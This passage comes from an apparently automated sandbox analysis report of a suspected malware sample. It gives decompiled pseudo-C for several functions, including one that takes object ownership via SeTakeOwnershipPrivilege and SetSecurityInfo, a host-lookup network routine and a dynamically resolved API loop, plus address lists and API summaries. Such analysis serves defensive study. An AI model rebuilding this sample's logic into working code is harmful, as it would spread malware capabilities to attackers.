													_t169 = E003966C0( &_v468);
													goto L85;
												}
												__eflags = _t386[0xb];
												if(__eflags == 0) {
													E003967E0(_t386);
													_t252 = E00397070(_t386,  &_v468);
													__eflags = _t252;
													if(_t252 != 0) {
														goto L50;
													}
													_t169 = E003966C0( &_v468);
													goto L85;
												}
												_push(0x3c);
												goto L84;
											}
											_t253 = E00397070(_t316,  &_v468); // executed
											__eflags = _t253;
											if(_t253 != 0) {
												goto L50;
											}
											_t169 = E003966C0( &_v468);
											goto L85;
										}
										_push(0x3b);
										goto L84;
									}
									_push(0x37);
									goto L84;
								}
								L26:
								E00399090(__eflags,  &_v268, 0x3e);
								_t367 =  *0x3b8628; // 0x593938
								_t394 = _t394 + 8;
								__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t367 + 0xe0))))(_v16,  &_v268);
								if(__eflags != 0) {
									_t259 = 0;
									__eflags = _v52;
									if(__eflags != 0) {
										_t259 = 1;
									}
									_v24 = 0;
									_t260 = E00398F40( *((intOrPtr*)(_t271 + 4)), _v12, __eflags, _v12, _t259,  &_v24); // executed
									_t386 = _t260;
									__eflags = _t386;
									if(_t386 != 0) {
										goto L34;
									} else {
										__eflags = _v24 - 1;
										if(__eflags == 0) {
											 *(_t271 + 0x38) = 4;
										}
										_push(0x3a);
										goto L84;
									}
								}
								_push(0x43);
								goto L84;
							}
							_t331 = _v16;
							_t261 =  *_t331;
							__eflags = _t261 - 0x540073;
							if(_t261 != 0x540073) {
								L18:
								__eflags = _t261 - 0x740073;
								if(_t261 == 0x740073) {
									__eflags =  *((intOrPtr*)(_t331 + 4)) - 0x720041;
									if( *((intOrPtr*)(_t331 + 4)) == 0x720041) {
										_v48 = 1;
									}
								}
								L21:
								__eflags = _t386;
								if(__eflags == 0) {
									goto L26;
								}
								__eflags = _v48;
								if(_v48 != 0) {
									goto L25;
								}
								__eflags = _v52;
								if(_v52 != 0) {
									goto L25;
								}
								E00391680(_t386, _t386[0x10]);
								E00393040( *((intOrPtr*)(_t271 + 4)), __eflags, _v12);
								goto L26;
							}
							__eflags =  *((intOrPtr*)(_t331 + 4)) - 0x720061;
							if( *((intOrPtr*)(_t331 + 4)) != 0x720061) {
								goto L18;
							}
							_v48 = 1;
							_v52 = 1;
							goto L21;
						}
						L13:
						_push(0x37);
						goto L84;
					}
					_t369 =  *(_t282 + 8);
					__eflags = _t369;
					if(__eflags == 0) {
						goto L13;
					} else {
						_t335 = 0x7fffffff;
						_t266 = _t369;
						while(1) {
							__eflags =  *_t266;
							if( *_t266 == 0) {
								break;
							}
							_t266 =  &(_t266[0]);
							_t335 = _t335 - 1;
							__eflags = _t335;
							if(__eflags != 0) {
								continue;
							}
							_push(0x37);
							goto L84;
						}
						__eflags = _t335;
						if(__eflags == 0) {
							goto L13;
						}
						__eflags = E0039BA40(_t271 + 0x4f4, _t369, 0x7fffffff - _t335,  &_v20,  &_v28);
						if(__eflags != 0) {
							goto L12;
						}
						_push(0x38);
						goto L84;
					}
				} else {
					 *(_t271 + 0x38) = 2;
					_push(0x35);
					L84:
					_t169 = E00391C70(_t396);
					L85:
					_t390 = _t389 + 4;
					_v8 = _t169;
					L86:
					 *(_t271 + 0x4f0) = _v8;
					 *(_t271 + 0x64) = memcpy(_t271 + 0x6c,  &_v596, 0x20 << 2);
					 *(_t271 + 0x68) = _v44;
					_t173 = memcpy(_t271 + 0xec,  &_v2008, 0x100 << 2);
					_t392 = _t390 + 0x18;
					if(_t173 != 0) {
						E0039BB40(_t173);
						_t392 = _t392 + 4;
					}
					_t174 =  *((intOrPtr*)(_t271 + 0x60));
					if( *((intOrPtr*)(_t271 + 0x60)) != 0) {
						E0039BB40(_t174);
						_t392 = _t392 + 4;
					}
					if(_v12 == 0) {
						 *((intOrPtr*)(_t271 + 0x5c)) = 0;
					} else {
						_t188 = E003966C0(_v12);
						_t392 = _t392 + 4;
						 *((intOrPtr*)(_t271 + 0x5c)) = _t188;
					}
					_t175 = _v16;
					_t383 = 0;
					if(_v16 == 0) {
						 *((intOrPtr*)(_t271 + 0x60)) = 0;
					} else {
						_t186 = E003966C0(_t175);
						_t392 = _t392 + 4;
						 *((intOrPtr*)(_t271 + 0x60)) = _t186;
					}
					_t378 = _v68;
					if(_t378 <= 0) {
						L99:
						_t176 = _v60;
						if(_v60 != 0) {
							E0039BB40(_t176);
							_t392 = _t392 + 4;
						}
						_t177 = _v32;
						if(_v32 != 0) {
							E0039BB40(_t177);
							_t392 = _t392 + 4;
						}
						_t178 = _v40;
						if(_v40 != 0) {
							E0039BB40(_t178);
							_t392 = _t392 + 4;
						}
						_t179 = _v20;
						if(_v20 != 0) {
							E0039BB40(_t179);
						}
						return _v64;
					} else {
						do {
							E0039BB40( *((intOrPtr*)(_v40 + _t383 * 4)));
							_t383 = 1 + _t383;
							_t392 = _t392 + 4;
						} while (_t383 < _t378);
						goto L99;
					}
				}
			}














































































    0x00398889
    0x0039888a
    0x0039888b
    0x0039889b
    0x0039889d
    0x003988a0
    0x003988a3
    0x003988a6
    0x003988a9
    0x003988ac
    0x003988af
    0x003988b2
    0x003988b5
    0x003988b8
    0x003988bb
    0x003988be
    0x003988c1
    0x003988c4
    0x003988c7
    0x003988ca
    0x003988dc
    0x003988e1
    0x003988e4
    0x003988e7
    0x003988ed
    0x003988f4
    0x003988f6
    0x00398912
    0x00398917
    0x0039891a
    0x0039891d
    0x00398920
    0x00398923
    0x00398e3b
    0x00000000
    0x00398e3b
    0x00398929
    0x0039892e
    0x00398931
    0x00398934
    0x00398937
    0x0039893a
    0x0039898d
    0x00398995
    0x0039899a
    0x0039899d
    0x0039899f
    0x003989bd
    0x003989bf
    0x003989c7
    0x003989cd
    0x003989de
    0x003989e0
    0x003989e2
    0x00398a44
    0x00398a44
    0x00398a46
    0x00398ab7
    0x00398ac2
    0x00398ac7
    0x00398aca
    0x00398acc
    0x00398ae5
    0x00398ae7
    0x00398af9
    0x00398b01
    0x00398b06
    0x00398b19
    0x00398b1b
    0x00398c81
    0x00398c89
    0x00398c8e
    0x00398c9f
    0x00398ca1
    0x00398ca3
    0x00398ca5
    0x00398d1a
    0x00398d1f
    0x00398d21
    0x00398d2e
    0x00398d30
    0x00398d35
    0x00398d37
    0x00398d3b
    0x00398d3b
    0x00398d49
    0x00398d4e
    0x00398d50
    0x00398d66
    0x00398d67
    0x00398d68
    0x00398d87
    0x00398d89
    0x00398d92
    0x00398d92
    0x00398dbb
    0x00398dc0
    0x00398dc2
    0x00398dc8
    0x00398dcb
    0x00398dcd
    0x00398dd0
    0x00398dd5
    0x00398dd8
    0x00398dd8
    0x00398de0
    0x00398de5
    0x00398de8
    0x00398deb
    0x00398ded
    0x00398e15
    0x00398e1d
    0x00398e23
    0x00398e28
    0x00398e28
    0x00398e32
    0x00398def
    0x00398df1
    0x00398df9
    0x00398dff
    0x00398e02
    0x00398e02
    0x00000000
    0x00398ded
    0x00398dc4
    0x00000000
    0x00398dc4
    0x00398d8b
    0x00000000
    0x00398d52
    0x00398d59
    0x00000000
    0x00398d59
    0x00398d50
    0x00398d25
    0x00398d2a
    0x00398d2c
    0x00000000
    0x00000000
    0x00000000
    0x00398d2c
    0x00398cac
    0x00398cae
    0x00398cd5
    0x00398cd7
    0x00398d04
    0x00398d10
    0x00000000
    0x00398d10
    0x00398cdb
    0x00398ce0
    0x00398ce5
    0x00398ce8
    0x00398cf4
    0x00000000
    0x00398cf4
    0x00398cb2
    0x00398cbd
    0x00398cc1
    0x00398cc4
    0x00000000
    0x00398cc4
    0x00398b23
    0x00398b28
    0x00398b2a
    0x00398b2c
    0x00398b4f
    0x00398b54
    0x00398b56
    0x00398b8e
    0x00398b91
    0x00398bf6
    0x00398bfe
    0x00398c01
    0x00398c04
    0x00398c09
    0x00398c0c
    0x00398c0c
    0x00398c10
    0x00398c10
    0x00398c16
    0x00398c18
    0x00000000
    0x00000000
    0x00398c1a
    0x00398c1e
    0x00398c21
    0x00000000
    0x00000000
    0x00398c23
    0x00398c26
    0x00398c29
    0x00398c29
    0x00398c2a
    0x00000000
    0x00000000
    0x00398c32
    0x00398c32
    0x00398c32
    0x00398c35
    0x00398c3c
    0x00398c3e
    0x00398c41
    0x00398c44
    0x00398c56
    0x00398c5e
    0x00398c6e
    0x00398c6e
    0x00000000
    0x00398c44
    0x00398c2e
    0x00398c30
    0x00000000
    0x00000000
    0x00000000
    0x00398c30
    0x00398b95
    0x00398ba3
    0x00398ba8
    0x00398baa
    0x00398bbd
    0x00398bc0
    0x00398bc1
    0x00398bc2
    0x00398bdc
    0x00398be1
    0x00398be3
    0x00000000
    0x00000000
    0x00398be9
    0x00000000
    0x00398be9
    0x00398bb3
    0x00000000
    0x00398bb3
    0x00398b58
    0x00398b5b
    0x00398b66
    0x00398b74
    0x00398b79
    0x00398b7b
    0x00000000
    0x00000000
    0x00398b84
    0x00000000
    0x00398b84
    0x00398b5d
    0x00000000
    0x00398b5d
    0x00398b35
    0x00398b3a
    0x00398b3c
    0x00000000
    0x00000000
    0x00398b45
    0x00000000
    0x00398b45
    0x00398ae9
    0x00000000
    0x00398ae9
    0x00398ace
    0x00000000
    0x00398ace
    0x00398a48
    0x00398a51
    0x00398a59
    0x00398a5f
    0x00398a72
    0x00398a74
    0x00398a7d
    0x00398a7f
    0x00398a82
    0x00398a84
    0x00398a84
    0x00398a95
    0x00398a98
    0x00398a9d
    0x00398a9f
    0x00398aa1
    0x00000000
    0x00398aa3
    0x00398aa3
    0x00398aa7
    0x00398aa9
    0x00398aa9
    0x00398ab0
    0x00000000
    0x00398ab0
    0x00398aa1
    0x00398a76
    0x00000000
    0x00398a76
    0x003989e4
    0x003989e7
    0x003989e9
    0x003989ee
    0x00398a06
    0x00398a06
    0x00398a0b
    0x00398a0d
    0x00398a14
    0x00398a16
    0x00398a16
    0x00398a14
    0x00398a1d
    0x00398a1d
    0x00398a1f
    0x00000000
    0x00000000
    0x00398a21
    0x00398a24
    0x00000000
    0x00000000
    0x00398a26
    0x00398a29
    0x00000000
    0x00000000
    0x00398a31
    0x00398a3d
    0x00000000
    0x00398a3d
    0x003989f0
    0x003989f7
    0x00000000
    0x00000000
    0x003989fe
    0x00398a01
    0x00000000
    0x00398a01
    0x003989a1
    0x003989a1
    0x00000000
    0x003989a1
    0x0039893c
    0x0039893f
    0x00398941
    0x00000000
    0x00398943
    0x00398943
    0x00398948
    0x00398950
    0x00398950
    0x00398953
    0x00000000
    0x00000000
    0x00398955
    0x00398958
    0x00398958
    0x00398959
    0x00000000
    0x00000000
    0x0039895b
    0x00000000
    0x0039895b
    0x00398962
    0x00398964
    0x00000000
    0x00000000
    0x00398982
    0x00398984
    0x00000000
    0x00000000
    0x00398986
    0x00000000
    0x00398986
    0x003988f8
    0x003988f8
    0x003988ff
    0x00398e3d
    0x00398e3d
    0x00398e42
    0x00398e42
    0x00398e45
    0x00398e48
    0x00398e51
    0x00398e67
    0x00398e7e
    0x00398e81
    0x00398e81
    0x00398e85
    0x00398e88
    0x00398e8d
    0x00398e8d
    0x00398e90
    0x00398e95
    0x00398e98
    0x00398e9d
    0x00398e9d
    0x00398ea4
    0x00398eb7
    0x00398ea6
    0x00398eaa
    0x00398eaf
    0x00398eb2
    0x00398eb2
    0x00398ebe
    0x00398ec1
    0x00398ec5
    0x00398ed5
    0x00398ec7
    0x00398ec8
    0x00398ecd
    0x00398ed0
    0x00398ed0
    0x00398ed8
    0x00398edd
    0x00398ef4
    0x00398ef4
    0x00398efc
    0x00398eff
    0x00398f04
    0x00398f04
    0x00398f07
    0x00398f0c
    0x00398f0f
    0x00398f14
    0x00398f14
    0x00398f17
    0x00398f1c
    0x00398f1f
    0x00398f24
    0x00398f24
    0x00398f27
    0x00398f2c
    0x00398f2f
    0x00398f34
    0x00398f3d
    0x00398ee0
    0x00398ee0
    0x00398ee7
    0x00398eec
    0x00398eed
    0x00398ef0
    0x00000000
    0x00398ee0
    0x00398edd

    APIs
    • memset.MSVCRT ref: 003988CA
    • memset.MSVCRT ref: 003988DC
      • Part of subcall function 00398F40: ??3@YAXPAX@Z.MSVCRT ref: 00398FEF
      • Part of subcall function 0039A270: memset.MSVCRT ref: 0039A2A2
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    • memcpy.MSVCRT ref: 00398E15
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003A12C0, Relevance: 7.6, APIs: 5, Instructions: 74network
    APIs
    • WSAStartup.WS2_32(00000202,?), ref: 003A12E2
    • gethostname.WS2_32(?,000000FF), ref: 003A1302
    • getaddrinfo.WS2_32(?,00000000,00000000,00000000), ref: 003A1322
    • freeaddrinfo.WS2_32(00000000), ref: 003A1380
    • WSACleanup.WS2_32 ref: 003A1386
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003980A0, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 199
    C-Code - Quality: 62%
    			E003980A0(intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				char _v12;
				char _v16;
				void* _v20;
				short _v24;
				char _v28;
				short _v32;
				char _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				int _v48;
				int _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				int _v80;
				int _v92;
				intOrPtr _v96;
				void _v100;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t71;
				intOrPtr _t74;
				void* _t82;
				intOrPtr _t83;
				intOrPtr _t94;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr _t104;
				intOrPtr _t109;
				intOrPtr _t113;
				intOrPtr _t114;
				intOrPtr _t116;
				intOrPtr _t122;
				intOrPtr _t127;
				void* _t128;

				_t113 =  *0x3b8628; // 0x593938
				_push( &_v20);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(1);
				_v16 = 0;
				_v8 = 0;
				_v20 = 0;
				_v12 = 0;
				_v28 = 0;
				_v24 = 0x100;
				_v36 = 0;
				_v32 = 0x500;
				_push( &_v28);
				if( *((intOrPtr*)( *((intOrPtr*)(_t113 + 0x158))))() == 0) {
					L11:
					_t114 =  *0x3b8628; // 0x593938
					_t128 =  *((intOrPtr*)( *((intOrPtr*)(_t114 + 0x30))))();
				} else {
					_t74 =  *0x3b8628; // 0x593938
					_push( &_v8);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0x220);
					_push(0x20);
					_push(2);
					_push( &_v36);
					if( *((intOrPtr*)( *((intOrPtr*)(_t74 + 0x158))))() == 0) {
						goto L11;
					} else {
						memset( &_v100, 0, 0x40);
						_v72 = _v20;
						_v40 = _v8;
						_t104 =  *0x3b8628; // 0x593938
						_v100 = 0x80000000;
						_v96 = 2;
						_v92 = 0;
						_v80 = 0;
						_v76 = 5;
						_v68 = 0x10000000;
						_v64 = 2;
						_v60 = 0;
						_v48 = 0;
						_v44 = 2;
						_t128 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x1b0))))(2,  &_v100, 0,  &_v12);
						if(_t128 != 0) {
							L10:
							if(_t128 == 0xffffffff) {
								goto L11;
							}
						} else {
							_t127 = _a8;
							_t122 =  *0x3b8628; // 0x593938
							_t82 =  *((intOrPtr*)( *((intOrPtr*)(_t122 + 0x1a8))))(_a4, _t127, 4, 0, 0, _v12, 0); // executed
							_t128 = _t82;
							if(_t128 == 0 || _t128 != 5) {
								goto L10;
							} else {
								_t83 =  *0x3b8628; // 0x593938
								_t39 = _t83 + 0x150; // 0x593a88
								_push( *((intOrPtr*)( *((intOrPtr*)(_t83 + 0x100))))(0x20,  &_v16));
								if( *((intOrPtr*)( *_t39))() == 0) {
									goto L11;
								} else {
									if(E003B1FF0(1, L"SeTakeOwnershipPrivilege", _v16) == 0) {
										goto L11;
									} else {
										_t109 =  *0x3b8628; // 0x593938
										_t128 =  *((intOrPtr*)( *((intOrPtr*)(_t109 + 0x1a8))))(_a4, _t127, 1, _v8, 0, 0, 0);
										if(_t128 != 0) {
											goto L10;
										} else {
											if(E003B1FF0(0, L"SeTakeOwnershipPrivilege", _v16) == 0) {
												goto L11;
											} else {
												_t94 =  *0x3b8628; // 0x593938
												_t128 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0x1a8))))(_a4, _t127, 4, 0, 0, _v12, 0);
												goto L10;
											}
										}
									}
								}
							}
						}
					}
				}
				_t63 = _v8;
				if(_t63 != 0) {
					_t100 =  *0x3b8628; // 0x593938
					 *((intOrPtr*)( *((intOrPtr*)(_t100 + 0x154))))(_t63);
				}
				_t64 = _v20;
				if(_t64 != 0) {
					_t71 =  *0x3b8628; // 0x593938
					 *((intOrPtr*)( *((intOrPtr*)(_t71 + 0x154))))(_t64);
				}
				_t65 = _v12;
				if(_t65 != 0) {
					_t116 =  *0x3b8628; // 0x593938
					 *((intOrPtr*)( *((intOrPtr*)(_t116 + 0x9c))))(_t65);
				}
				_t66 = _v16;
				if(_t66 != 0) {
					_t98 =  *0x3b8628; // 0x593938
					 *((intOrPtr*)( *((intOrPtr*)(_t98 + 0xf8))))(_t66);
				}
				return _t128;
			}










































    0x003980a8
    0x003980b4
    0x003980b5
    0x003980b6
    0x003980b7
    0x003980b8
    0x003980b9
    0x003980ba
    0x003980bb
    0x003980bc
    0x003980bd
    0x003980c2
    0x003980c5
    0x003980c8
    0x003980cb
    0x003980ce
    0x003980d1
    0x003980d7
    0x003980da
    0x003980e6
    0x003980eb
    0x0039824f
    0x0039824f
    0x0039825a
    0x003980f1
    0x003980f1
    0x003980f9
    0x00398100
    0x00398101
    0x00398102
    0x00398103
    0x00398104
    0x00398105
    0x00398106
    0x0039810b
    0x00398112
    0x00398116
    0x0039811b
    0x00000000
    0x00398121
    0x00398128
    0x0039813a
    0x0039813e
    0x00398141
    0x0039814b
    0x00398152
    0x00398155
    0x00398158
    0x0039815b
    0x00398162
    0x00398169
    0x0039816c
    0x0039816f
    0x00398172
    0x0039817e
    0x00398182
    0x0039824a
    0x0039824d
    0x00000000
    0x00000000
    0x00398188
    0x0039818b
    0x00398191
    0x003981a5
    0x003981a7
    0x003981ab
    0x00000000
    0x003981ba
    0x003981ba
    0x003981cb
    0x003981d3
    0x003981da
    0x00000000
    0x003981dc
    0x003981f2
    0x00000000
    0x003981f4
    0x003981fa
    0x00398210
    0x00398214
    0x00000000
    0x00398216
    0x0039822b
    0x00000000
    0x0039822d
    0x00398233
    0x00398248
    0x00000000
    0x00398248
    0x0039822b
    0x00398214
    0x003981f2
    0x003981da
    0x003981ab
    0x00398182
    0x0039811b
    0x0039825c
    0x00398261
    0x00398263
    0x00398270
    0x00398270
    0x00398272
    0x00398277
    0x0039827a
    0x00398285
    0x00398285
    0x00398287
    0x0039828c
    0x0039828e
    0x0039829b
    0x0039829b
    0x0039829d
    0x003982a2
    0x003982a4
    0x003982b1
    0x003982b1
    0x003982bb

    APIs
    • memset.MSVCRT ref: 00398128
    • SetSecurityInfo.ADVAPI32(?,?,00000004,00000000,00000000,?,00000000), ref: 003981A5
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 0039FD15, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 110
    C-Code - Quality: 54%
    			E0039FD15() {
				intOrPtr _t183;
				void* _t184;
				void* _t187;
				int _t194;
				signed int* _t204;
				int _t213;
				int _t218;
				int _t220;
				int _t224;
				int _t225;
				int _t227;
				int _t230;
				void* _t232;
				int _t236;
				int _t237;
				int _t239;
				int _t241;
				int _t242;
				int _t243;
				int _t244;
				int _t248;
				int _t249;
				int _t253;
				int _t255;
				int _t261;
				int _t267;
				int _t269;
				int _t270;
				int _t272;
				int _t282;
				int _t287;
				intOrPtr _t288;
				int _t289;
				signed int* _t299;
				int _t302;
				signed int _t322;
				signed int _t325;
				signed int _t341;
				int _t346;
				int _t361;
				signed int _t363;
				int _t374;
				int _t376;
				int _t377;
				int _t378;
				signed short* _t379;
				int _t384;
				signed int _t385;
				int _t390;
				int _t396;
				signed int _t398;
				signed int _t405;
				int _t407;
				int _t408;
				void* _t409;
				void* _t411;
				int _t412;
				void* _t413;
				void* _t414;
				void* _t415;
				void* _t416;
				void* _t417;
				void* _t421;
				void* _t422;
				void* _t423;
				void* _t427;

				E0039E7D0(_t413 - 0x9c0,  *((intOrPtr*)(_t413 - 0x34))); // executed
				_t415 = _t414 + 8;
				_t183 = E003B1210();
				_push(8);
				 *0x3b8580 = _t183;
				L0039A47E();
				_t416 = _t415 + 4;
				if(_t183 == _t298) {
					_t410 = 0;
					__eflags = 0;
				} else {
					_t410 = E0039E850(_t183);
				}
				_t184 = E00393D50(_t410); // executed
				if(_t184 != 0) {
					__eflags = _t410 - _t298;
					if(__eflags != 0) {
						E00392420(_t410);
						_push(_t410);
						L00391CB0();
						_t416 = _t416 + 4;
					}
					_t302 =  *0x3b8628; // 0x593938
					 *0x3b8570 = _t298;
					 *0x3b8584 = _t298;
					 *0x3b8574 = _t298;
					 *0x3b8578 = _t298;
					 *((intOrPtr*)( *((intOrPtr*)(_t302 + 0xcc))))(0x3b8594, 0x800);
					E00391B20(_t413 - 0x5c0,  *((intOrPtr*)(_t302 + 0xcc)), __eflags);
					_t187 = E0039BB30(_t413 - 0xc);
					_push(0x34);
					 *(_t413 - 0x58) = _t298;
					 *(_t413 - 0x28) = _t298;
					L0039A47E();
					_t417 = _t416 + 4;
					__eflags = _t187 - _t298;
					if(__eflags == 0) {
						 *(_t413 - 0x5b8) = _t298;
					} else {
						 *(_t413 - 0x5b8) = E003970B0(_t187);
					}
					E00399090(__eflags, _t413 - 0x9c0, 3);
					E0039F550(_t413 - 0x50, _t298, _t413 - 0x9c0, 0xa, _t413 - 0x54, _t413 - 0x50);
					E00391F00(_t413 - 0xc,  *((intOrPtr*)(_t413 - 0x54)),  *((intOrPtr*)(_t413 - 0x50))); // executed
					_t194 = E003969F0(_t413 - 0x5b8, _t413 - 0xc, _t413 - 0x5b8); // executed
					_t416 = _t417 + 0x24;
					__eflags = _t194;
					if(_t194 != 0) {
						 *(_t413 - 0x5c0) = _t413 - 0xc;
						__eflags = E003A0AD0(_t413 - 0x5c0,  *((intOrPtr*)( *(_t413 - 0x5b8) + 0x14)));
						if(__eflags == 0) {
							goto L12;
						}
						E00395700( *((intOrPtr*)(_t413 - 0x5bc)), __eflags);
						 *0x3b85ac = _t298;
						 *(_t413 - 0x30) = _t298;
						 *(_t413 - 0x2c) = _t298;
						 *(_t413 - 0x14) = _t298;
						 *(_t413 - 0x10) = _t298;
						 *(_t413 - 0x3c) = _t298;
						 *(_t413 - 0x38) = _t298;
						 *(_t413 - 0x44) = _t298;
						 *(_t413 - 0x40) = _t298;
						 *((intOrPtr*)( *( *0x3b8628)))(_t298, _t298, E003B08A0, _t413 - 0x5c0, _t298, _t413 - 0x74);
						 *(_t413 - 0x24) = _t298;
						while(1) {
							_t218 =  *(_t413 - 0x5b8);
							_t325 = 0;
							 *0x3b857c = 0;
							 *(_t413 - 0x20) = _t298;
							__eflags =  *((intOrPtr*)(_t218 + 0x18)) - _t298;
							if(__eflags <= 0) {
								goto L79;
							}
							do {
								_t384 =  *( *((intOrPtr*)(_t218 + 0x20)) + _t325 * 4);
								_t224 = L003994D0(_t413 - 0x5c0,  *((intOrPtr*)( *((intOrPtr*)(_t218 + 0x1c)) + _t325 * 4)), _t384); // executed
								__eflags = _t224;
								if(_t224 != 0) {
									__imp___time64(_t298);
									_t408 = _t384;
									_t385 =  *0x3b857c; // 0x1
									_t421 = _t416 + 4;
									_t410 = _t224;
									_t225 = _t224 -  *((intOrPtr*)( *((intOrPtr*)( *(_t413 - 0x5b8) + 0x24)) + _t385 * 8));
									__eflags = _t225;
									asm("sbb ebx, [ecx+edx*8+0x4]");
									 *(_t413 - 0x48) = _t408;
									if(__eflags < 0) {
										L27:
										_t298 = 0; // executed
										_t227 = E003A1B80(_t410, _t413 - 0xc, _t413 - 0x5c0, _t413 - 0x28); // executed
										_t416 = _t421 + 0xc;
										__eflags = _t227;
										if(_t227 == 0) {
											 *(_t413 - 0x20) =  *(_t413 - 0x20) + 1;
											 *( *((intOrPtr*)(_t413 - 0x5bc)) + 0xc) =  *(_t413 - 0x28);
											_t230 = _t410 -  *(_t413 - 0x3c);
											__eflags = _t230;
											asm("sbb edx, [ebp-0x38]");
											 *(_t413 - 0x48) = _t408;
											if(__eflags < 0) {
												L36:
												E003942A0(__eflags, _t413 - 0x5c0); // executed
												_t422 = _t416 + 4;
												_t232 = E003A12C0(); // executed
												_push(4);
												__eflags = _t232 - _t298;
												if(__eflags >= 0) {
													if(__eflags != 0) {
														_push(_t413 - 0x9c0);
														E00399090(__eflags);
														E00399090(__eflags, _t413 - 0xdc0, 7);
														_push(_t413 - 0xdc0);
														_push(_t413 - 0x9c0);
														_push(0xe);
														_t390 = _t413 - 0x5c0;
														_push(_t390); // executed
													} else {
														_push(_t413 - 0x9c0);
														E00399090(__eflags);
														E00399090(__eflags, _t413 - 0xdc0, 6);
														_push(_t413 - 0xdc0);
														_t390 = _t413 - 0x9c0;
														_push(_t390);
														_push(0xe);
														_push(_t413 - 0x5c0);
													}
												} else {
													_push(_t413 - 0x9c0);
													E00399090(__eflags);
													E00399090(__eflags, _t413 - 0xdc0, 5);
													_t390 = _t413 - 0xdc0;
													_push(_t390);
													_push(_t413 - 0x9c0);
													_push(0xe);
													_push(_t413 - 0x5c0);
												}
												_t236 = E00395A10(); // executed
												_t423 = _t422 + 0x20;
												 *(_t413 - 0x48) = _t298;
												do {
													__imp___time64(0);
													_t410 = _t236;
													_t237 =  *0x3b8570; // 0x0
													_t416 = _t423 + 4;
													_t408 = _t390;
													__eflags = _t237 - 2;
													if(_t237 == 2) {
														L46:
														_t239 = E003936E0(_t408, _t410, _t413 - 0xc, _t413 - 0x5c0,  *(_t413 - 0x14),  *(_t413 - 0x10)); // executed
														_t416 = _t416 + 0x10;
														asm("sbb edx, 0x0");
														 *(_t413 - 0x14) = _t410 - 0x708;
														 *(_t413 - 0x10) = _t408;
														__eflags = _t239 - 1;
														if(_t239 == 1) {
															 *0x3b85ac = _t239;
														}
														L48:
														_t241 = _t410 -  *(_t413 - 0x44);
														__eflags = _t241;
														asm("sbb ecx, [ebp-0x40]");
														 *(_t413 - 0x5c) = _t408;
														if(__eflags < 0) {
															L55:
															_t410 = _t410 -  *(_t413 - 0x30);
															__eflags = _t410;
															asm("sbb edi, [ebp-0x2c]");
															 *(_t413 - 0x5c) = _t408;
															if(__eflags < 0) {
																L62:
																_t242 = E00399890( *((intOrPtr*)(_t413 - 0x5bc)));
																__eflags = _t242;
																if(_t242 == 0) {
																	L77:
																	_t298 = 0;
																	__eflags = 0;
																	goto L78;
																}
																_push(1);
																_push(_t413 - 0x5c0);
																_t243 = E00395A10();
																_t416 = _t416 + 8;
																__eflags = _t243;
																if(__eflags == 0) {
																	goto L77;
																}
																_t390 = _t413 - 0x5c0;
																_t244 = E00397560(_t298, __eflags, _t390);
																_t416 = _t416 + 4;
																__eflags = _t244;
																if(_t244 == 0) {
																	__eflags =  *0x3b85ac;
																	if( *0x3b85ac != 0) {
																		L82:
																		E00391700(_t413 - 0xc);
																		E0039F850(_t298, _t413 - 0x5c0);
																		E0039C930(_t413 - 4);
																		_t298 = 0;
																		__eflags = 0;
																		goto L83;
																	}
																	goto L77;
																}
																__eflags =  *0x3b85ac;
																if( *0x3b85ac != 0) {
																	goto L82;
																}
																_t248 =  *0x3b8584; // 0x1
																_t410 = 0xa;
																__eflags = _t248;
																if(_t248 == 0) {
